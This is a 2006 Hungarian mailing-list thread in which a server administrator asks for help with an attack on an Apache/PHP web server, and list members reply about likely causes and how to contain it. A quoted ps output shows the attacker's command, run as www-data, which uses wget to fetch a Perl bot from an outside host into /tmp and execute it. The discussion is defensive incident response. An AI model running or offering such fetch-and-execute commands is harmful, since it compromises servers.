Segitseg, tamadjak a webszerveremet

Fábián Zoltán fz at szily.hu
2006. Okt. 5., Cs, 08:18:32 CEST 

A webszerver a hívásokon keresztül csak azt futtathatja, ami a webrootban
van.
Ami a webrooton belül van azt a rendszergazda teszi fel.

Ha nem tett fel a rendszergazda olyan anyagot, ami futtathat egy shellt vagy
valami aktív kódot, akkor két dolog lehet:

1. pl. egy PHP kód bugos vagy nem átgondolt és egyúttal pl. globals = on van
beállítva a PHP.ini-ben
2. Valahogyan feljutott a szerverre olyan kód, aminek nem kellene ott lenni:

  - Ez lehet egy csintalan user, aki kapott SSH-t, 
    telnetet vagy FTP-t és közvetlenül a webroot-ba teheti az anyagát
  - vagy megtörték a Linuxot egy be nem foltozott Linux biztonsági réssel és
úgy került fel az anyag.

Ha a fenti esetek egyike sincsen, akkor ne fogalalkozz vele.

...hozzátenném, hogy az én szerveremet amióta kint van a neten folyamatosan
támadják.
Eddig ilyen támadással nem sikerült megtörni, pedig WIN2003+Apache+PHP+MySQL
A logokban szépen látszik.

Fabio

--------
Fábián Zoltán
http://fz.szily.hu
-----Original Message-----
From: techinfo-bounces at lista.sulinet.hu
[mailto:techinfo-bounces at lista.sulinet.hu] On Behalf Of Kulyassa Robert
Sent: Thursday, October 05, 2006 1:22 AM
To: Techinfo
Subject: Re: Segitseg, tamadjak a webszerveremet


> >sh-t inditanak? Huh, hat ez eleg csunyan hangzik -az eddigiekhez 
> kepest- >ez azt jelenti, hogy mar bent vannak. Biztos vagy benne?
> 
> Nem, nem vagyok. Nem vagyok egy Linux guru. A fősulin 1 évig tanultam 
> Linuxot,

En semmilyen iskolaban nem tanultam ezt. ;)

> Ami az sh-t illeti, amint első levelemben írtam:
> 
> ps kimenete (részlet):
> 
> www-data 2715 0.0 0.2 2476 1160 ? S 11:26 0:00 sh -c cd /tmp; wget 
> http://cmgforum.net/botek.txt; mv botek.txt .sessx; perl .sessx; rem 
> botek.txt.*; wget .... blablabla

Hmm. Hat ez eleg csunya, telleg.
Azonban jo hir, hogy egyelore (ugy tunik) csak a www-data user neveben
garazdalkodnak. :)

> Elég egyértelmű, hogy mit akar csinálni, de már a /tmp-be sem tud 
> bejutni. Az apache error.log-ja tele van a próbálkozásokkal 
> (permission denied, file not exist stb.)

Valoszinuleg nem lehet futtatni a /tmp-ben... kuldj egy "mount"
kimenetet lecci.

Ha nem fontos a web, akkor allitsd le a webszervert es lojj le minden
www-data userhez tartozo processzt. Bar szerintem ehelyett eloszor
vizsgalodni, nezelodni tanulsagosabb...
Meg mondjuk crontab job-ja meg mindig lehet... bar nem valoszinu.

> Amit nem értek, és ezért nagyon zavar, az a sh -c része.  A www-data 
> user-nek a /bin/false a shell-je.

Igen, ezert nem tud belepni mondjuk ssh-n. De mondjuk crontab-bol (vagy php
exec vagy minek hivjak ezt phpul) miert ne futtathatna programokat.
Es ekkor mar az sh ugyanolyan program mint barmely masik.

--
qji

_______________________________________________
Techinfo mailing list
Techinfo at lista.sulinet.hu
http://lista.sulinet.hu/mailman/listinfo/techinfo
Illemtan: http://support.bkf.hu/illemtan.html
Ügyfélszolgálat FAQ: http://www.sulinet.hu/tart/cikk/sc/0/19789/1

További információk a(z) Techinfo levelezőlistáról